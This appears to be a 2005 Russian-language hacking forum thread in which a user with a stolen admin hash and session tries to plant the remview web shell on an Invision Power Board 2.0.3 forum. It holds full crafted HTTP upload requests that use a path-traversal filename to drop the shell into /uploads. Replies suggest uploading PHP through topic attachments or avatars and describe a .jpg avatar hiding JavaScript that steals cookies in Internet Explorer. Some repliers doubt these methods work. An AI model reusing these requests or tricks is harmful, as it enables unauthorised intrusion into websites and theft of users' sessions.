Вопрос про заливку шелла в IPB, посредством программы InetCrack

Discussion in 'Песочница' started by MDD, 5 Jun 2005.

  1. MDD

    MDD New Member

    Joined:
    5 Jun 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Господа, здравствуйте!
    Есть форум IPB 2.0.3
    Есть hash админа
    Есть session_id админа
    Собственно и в админку могу зайти (пароль админа тоже знаю)
    Но пермишны на папку со смайлами стоят неправильные и remview туда залить не могу.
    Попытался InetCrack-ом по статье товарища Algol-а (http://antichat.ru/txt/IPB) подменить запрос чтобы залить remview в /uploads (эта папка открыта на запись), но не получилось.
    Вот что я делал
    1. Взял InetCrack
    2. Пишу вот такой запрос в InetCrack-е

    --------

    POST http://АДРЕС_ФОРУМА/admin.php?adsess=СЕССИЯ_АДМИНА HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer: http://АДРЕС_ФОРУМА/admin.php?adsess=СЕССИЯ_АДМИНА&act=op&code=emo
    Accept-Language: ru
    Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 677
    Pragma: no-cache
    Cookie: member_id=ID_АДМИНА; pass_hash=ХЕШ_АДМИНА;

    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="adsess"

    СЕССИЯ_АДМИНА
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="code"

    emo_upload
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="act"

    op
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="MAX_FILE_SIZE"

    10000000000
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/REMVIEW.PHP"
    Content-Type: application/octet-stream

    Сюда, я так понял нада писать код remview-а
    -----------------------------7d43942c405bc--

    --------

    В ответ получаю ответ сервера и когда клацаю в InetCrack-е кнопку "Show body in browser" появляется окно броузера, в котором вижу кусок админки IPB-форума с надписью "Вы не выбрали папку для загрузки смайликов"
    При этом ни в папке смайлов ни в папке /uploads не появляется файл remview.php

    Подскажите, пожалуйста, что я делаю не так
    Может не тот запрос в InetCrack запихиваю
    Не могли бы написать 100%-но рабочий HTTP-запрос для IPB версии 2.0.3
    Заранее очень благодарен!!!

    Еще я понял, что можно как-то через заливку аватаров попытаться залить remview.
    Подскажите, пожалуйста, как???
     
    #1 MDD, 5 Jun 2005
    Last edited: 5 Jun 2005
  2. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    Проверь правильность session_id Админа.
     
  3. S1nt3z

    S1nt3z New Member

    Joined:
    2 Jun 2005
    Messages:
    17
    Likes Received:
    2
    Reputations:
    -3
    В IPB 2.0.3 надо ставить не admin.php?adsess= , а admin.php?s=
     
  4. MDD

    MDD New Member

    Joined:
    5 Jun 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    дык я ж ее беру из ссылки
    Т.е. захожу в админку под логином/паролем админа и из УРЛ-а браузера беру session_id
    Тем более если бы был неправильный session_id, то я думаю, что мне бы это написало, а так пишел, что я не выбрал папку для загрузки смайлика
     
  5. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    Я не понял где файл который ты загружаешь?
     
  6. MDD

    MDD New Member

    Joined:
    5 Jun 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    тока шо зашел на тот форум под логино/паролем и урл выглядит вот в таком формате
    http://АДРЕС_ФОРУМА/admin.php?printframes=1&adsess=СЕССИЯ_АДМИНА&
    т.е. получается все-таки admin.php?adsess=, а не admin.php?s=
     
  7. MDD

    MDD New Member

    Joined:
    5 Jun 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    да я так понял что нада не файл, а сам КОД этого файла писать в НТТР-запрос
    Вот сюда
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="MAX_FILE_SIZE"

    10000000000
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/REMVIEW.PHP"
    Content-Type: application/octet-stream

    ВОТ СЮДА ПИШУ КОД remview.php
    -----------------------------7d43942c405bc--

    Других методов как его приаттачить я не вижу
     
  8. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    280
    Likes Received:
    8
    Reputations:
    -1
    А все-таки попробуй по совету S1nt3za Отпровь в Инет Кряке запрос с алреслом : POST http://АДРЕС_ФОРУМА/admin.php?s=СЕССИЯ_АДМИНА HTTP/1.0
     
  9. MDD

    MDD New Member

    Joined:
    5 Jun 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Поставил admin.php?s=
    не помогло
    еще нашел что вместо act=op нада писать act=admin

    В итоге вот что получилось

    POST http://АДРЕС_ФОРУМА/admin.php? HTTP/1.0
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
    Referer: http://АДРЕС_ФОРУМА/admin.php?act=op&code=emo
    Accept-Language: ru
    Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
    Proxy-Connection: Keep-Alive
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Content-Length: 677
    Pragma: no-cache
    Cookie: member_id=3; pass_hash=ХЕШ_АДМИНА;

    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="adsess"

    0ba3d31d16ebfc45939b7a14e510742f
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="code"

    emo_upload
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="act"

    admin
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="MAX_FILE_SIZE"

    10000000000
    -----------------------------7d43942c405bc
    Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/ad_smiles.php"
    Content-Type: application/octet-stream

    --CODE HERE--
    -----------------------------7d43942c405bc--

    все-равно не помогает
    та же херня "Вы не выбрали директорию для загрузки смайлов"

    Господа, ну помогите, пожалуйста!!!
     
  10. S1nt3z

    S1nt3z New Member

    Joined:
    2 Jun 2005
    Messages:
    17
    Likes Received:
    2
    Reputations:
    -3
    Короче самый лёгкий способ это прицепить remview.php в темку (перед этим надо разрешить прикрепление php в темки) он автоматически зальётся в папку uploads , а далее дело техники !
     
  11. coyl

    coyl Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    125
    Likes Received:
    3
    Reputations:
    2
    чего-чего? в какую темку? с этого момента по подробнее плз =)
     
  12. MDD

    MDD New Member

    Joined:
    5 Jun 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    да нет
    залить то он зальет в темку, но форум меняет имя файла перед заливкой в /uploads т.е. если файл назывался remview.php, то после заливки его название и расширение поменяется и залитые .php файлы будут отображаться как текстовые...
    короче этот вариант не катит
    тем более, что я даже не смогу узнать как этот файл переименуется

    ГОСПОДАААА Ну помогите, пожалуйста, с InetCrack-ом
    Я начинаю думать, что только через него можно что-то сделать!!!
     
  13. S1nt3z

    S1nt3z New Member

    Joined:
    2 Jun 2005
    Messages:
    17
    Likes Received:
    2
    Reputations:
    -3
    Можно прицепить на php на аватарку
    чтобы узнать какое имя у него будет даже ламососу понятно Правой кнопкой --> СВОЙСТВА ! =DD
     
  14. MDD

    MDD New Member

    Joined:
    5 Jun 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    а ты сам это пробовал???
    форум даже с включенным разрешением на ПХП файлы в виде аватары благополучно создал мне в /upload .txt-файл с содержимым php файла
    Господа, ну дайте, пожалуйста, реальные советы!!!
     
  15. S1nt3z

    S1nt3z New Member

    Joined:
    2 Jun 2005
    Messages:
    17
    Likes Received:
    2
    Reputations:
    -3
    Корочи балин я писал на HTML код под IPB который отправляет куки в приват , и сохранил как jpg !
    Вот потом загрузил эту картинку поставил на аватар , запостил ссылку на аватар и нажал на неё (у меня был IE(У Оперы такого бага нету)) как ни странно IE выполнил этот HTML и JavaScript код !!!!!
    А под php я не пробовал !!!
     
  16. MDD

    MDD New Member

    Joined:
    5 Jun 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    я не понял
    Ты что сначала писал как html, потом полученный хтмл-файл просто сохранил с расширением .jpg???
    и ОНО что заработало???
     
  17. MDD

    MDD New Member

    Joined:
    5 Jun 2005
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Ну что???
    Никто не может помочь???
     
  18. S1nt3z

    S1nt3z New Member

    Joined:
    2 Jun 2005
    Messages:
    17
    Likes Received:
    2
    Reputations:
    -3
    Да сохранил в jpg , прицепил на аватарку и как ни странно ЗАРАБОТАЛО !
    ЗЫ Такая бага только в IPB 2.0.x =) ;) B)
     
  19. KEZ

    KEZ Ненасытный школьник

    Joined:
    18 May 2005
    Messages:
    1,604
    Likes Received:
    754
    Reputations:
    397
    Прицепить файл пхп к темке неполучится.
    Запрос модифицировать мне кажется тоже не получится, там генерируется session id только при вводе реального пароля. Врядли чтото получится сделать что бы там не говорили.
     
  20. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Получится только если откроешь этот свой аватар. С таким же успехом можно просто загрузить картинку в форум. Это не уязвимость форума, и даже не уязвимость IE а особенность. А через тэг img в аватаре скрипт на клиенте уже не будет отрабатываться
     
Loading...